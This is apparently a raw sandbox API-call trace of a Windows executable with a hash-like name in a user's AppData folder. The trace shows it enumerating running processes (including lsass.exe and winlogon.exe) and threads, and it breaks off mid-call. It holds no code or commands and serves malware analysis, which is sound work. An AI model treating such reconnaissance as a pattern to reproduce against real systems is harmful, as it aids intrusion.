GetTickCount () returned 0x113d9cc [0203.288] GetCurrentThreadId () returned 0x600 [0203.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.288] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0203.289] GetTickCount () returned 0x113d9cc [0203.289] GetCurrentThreadId () returned 0x600 [0203.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.289] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.290] GetTickCount () returned 0x113d9cc [0203.290] GetCurrentThreadId () returned 0x600 [0203.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.290] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0203.291] GetTickCount () returned 0x113d9cc [0203.291] GetCurrentThreadId () returned 0x600 [0203.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.291] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0203.292] GetTickCount () returned 0x113d9cc [0203.292] GetCurrentThreadId () returned 0x600 [0203.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.292] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0203.293] GetTickCount () returned 0x113d9cc [0203.293] GetCurrentThreadId () returned 0x600 [0203.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.293] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0203.294] GetTickCount () returned 0x113d9cc [0203.294] GetCurrentThreadId () returned 0x600 [0203.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.295] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.296] GetTickCount () returned 0x113d9cc [0203.296] GetCurrentThreadId () returned 0x600 [0203.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.296] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.297] GetTickCount () returned 0x113d9cc [0203.297] GetCurrentThreadId () returned 0x600 [0203.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.297] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.298] GetTickCount () returned 0x113d9cc [0203.298] GetCurrentThreadId () returned 0x600 [0203.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.298] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.299] GetTickCount () returned 0x113d9cc [0203.299] GetCurrentThreadId () returned 0x600 [0203.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.299] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.301] GetTickCount () returned 0x113d9cc [0203.301] GetCurrentThreadId () returned 0x600 [0203.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.301] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0203.302] GetTickCount () returned 0x113d9dc [0203.302] GetCurrentThreadId () returned 0x600 [0203.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.302] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.303] GetTickCount () returned 0x113d9dc [0203.303] GetCurrentThreadId () returned 0x600 [0203.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.303] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x13c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.304] GetTickCount () returned 0x113d9dc [0203.304] GetCurrentThreadId () returned 0x600 [0203.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.304] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0203.305] GetTickCount () returned 0x113d9dc [0203.305] GetCurrentThreadId () returned 0x600 [0203.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.305] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.306] GetTickCount () returned 0x113d9dc [0203.306] GetCurrentThreadId () returned 0x600 [0203.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.307] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x37c, pcPriClassBase=13, dwFlags=0x0, szExeFile="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 1 [0203.308] GetTickCount () returned 0x113d9dc [0203.308] GetCurrentThreadId () returned 0x600 [0203.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.308] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0203.309] GetTickCount () returned 0x113d9dc [0203.309] GetCurrentThreadId () returned 0x600 [0203.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.309] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0203.310] GetTickCount () returned 0x113d9dc [0203.310] GetCurrentThreadId () returned 0x600 [0203.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.310] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0203.311] GetTickCount () returned 0x113d9dc [0203.311] GetCurrentThreadId () returned 0x600 [0203.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.311] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.312] GetTickCount () returned 0x113d9dc [0203.312] GetCurrentThreadId () returned 0x600 [0203.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.312] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0203.313] GetTickCount () returned 0x113d9dc [0203.313] Thread32First (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.314] GetCurrentThreadId () returned 0x600 [0203.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.314] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.315] GetTickCount () returned 0x113d9dc [0203.315] GetCurrentThreadId () returned 0x600 [0203.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.315] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.316] GetTickCount () returned 0x113d9dc [0203.316] GetCurrentThreadId () returned 0x600 [0203.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.316] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.317] GetTickCount () returned 0x113d9dc [0203.317] GetCurrentThreadId () returned 0x600 [0203.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.317] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.318] GetTickCount () returned 0x113d9eb [0203.318] GetCurrentThreadId () returned 0x600 [0203.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.318] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.319] GetTickCount () returned 0x113d9eb [0203.319] GetCurrentThreadId () returned 0x600 [0203.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.319] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.319] GetTickCount () returned 0x113d9eb [0203.319] GetCurrentThreadId () returned 0x600 [0203.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.319] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.320] GetTickCount () returned 0x113d9eb [0203.320] GetCurrentThreadId () returned 0x600 [0203.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.320] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.321] GetTickCount () returned 0x113d9eb [0203.321] GetCurrentThreadId () returned 0x600 [0203.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.321] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.322] GetTickCount () returned 0x113d9eb [0203.322] GetCurrentThreadId () returned 0x600 [0203.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.322] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.323] GetTickCount () returned 0x113d9eb [0203.323] GetCurrentThreadId () returned 0x600 [0203.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.323] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.323] GetTickCount () returned 0x113d9eb [0203.323] GetCurrentThreadId () returned 0x600 [0203.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.323] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.324] GetTickCount () returned 0x113d9eb [0203.324] GetCurrentThreadId () returned 0x600 [0203.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.324] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.325] GetTickCount () returned 0x113d9eb [0203.325] GetCurrentThreadId () returned 0x600 [0203.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.325] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.326] GetTickCount () returned 0x113d9eb [0203.326] GetCurrentThreadId () returned 0x600 [0203.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.326] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.326] GetTickCount () returned 0x113d9eb [0203.326] GetCurrentThreadId () returned 0x600 [0203.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.326] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.327] GetTickCount () returned 0x113d9eb [0203.327] GetCurrentThreadId () returned 0x600 [0203.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.327] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.328] GetTickCount () returned 0x113d9eb [0203.328] GetCurrentThreadId () returned 0x600 [0203.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.328] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.329] GetTickCount () returned 0x113d9eb [0203.329] GetCurrentThreadId () returned 0x600 [0203.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.329] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.329] GetTickCount () returned 0x113d9eb [0203.329] GetCurrentThreadId () returned 0x600 [0203.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.329] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.330] GetTickCount () returned 0x113d9eb [0203.330] GetCurrentThreadId () returned 0x600 [0203.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.330] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.331] GetTickCount () returned 0x113d9eb [0203.331] GetCurrentThreadId () returned 0x600 [0203.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.331] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.331] GetTickCount () returned 0x113d9eb [0203.331] GetCurrentThreadId () returned 0x600 [0203.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.332] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.332] GetTickCount () returned 0x113d9eb [0203.332] GetCurrentThreadId () returned 0x600 [0203.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.332] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.333] GetTickCount () returned 0x113d9fb [0203.333] GetCurrentThreadId () returned 0x600 [0203.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.333] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.334] GetTickCount () returned 0x113d9fb [0203.334] GetCurrentThreadId () returned 0x600 [0203.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.334] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.334] GetTickCount () returned 0x113d9fb [0203.334] GetCurrentThreadId () returned 0x600 [0203.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.335] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.335] GetTickCount () returned 0x113d9fb [0203.335] GetCurrentThreadId () returned 0x600 [0203.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.335] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.336] GetTickCount () returned 0x113d9fb [0203.336] GetCurrentThreadId () returned 0x600 [0203.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.336] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.337] GetTickCount () returned 0x113d9fb [0203.337] GetCurrentThreadId () returned 0x600 [0203.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.337] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.337] GetTickCount () returned 0x113d9fb [0203.337] GetCurrentThreadId () returned 0x600 [0203.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.337] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.338] GetTickCount () returned 0x113d9fb [0203.338] GetCurrentThreadId () returned 0x600 [0203.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.338] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.339] GetTickCount () returned 0x113d9fb [0203.339] GetCurrentThreadId () returned 0x600 [0203.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.339] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.340] GetTickCount () returned 0x113d9fb [0203.340] GetCurrentThreadId () returned 0x600 [0203.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.340] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.340] GetTickCount () returned 0x113d9fb [0203.340] GetCurrentThreadId () returned 0x600 [0203.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.340] HeapFree (in: hHeap=0x2c0000, 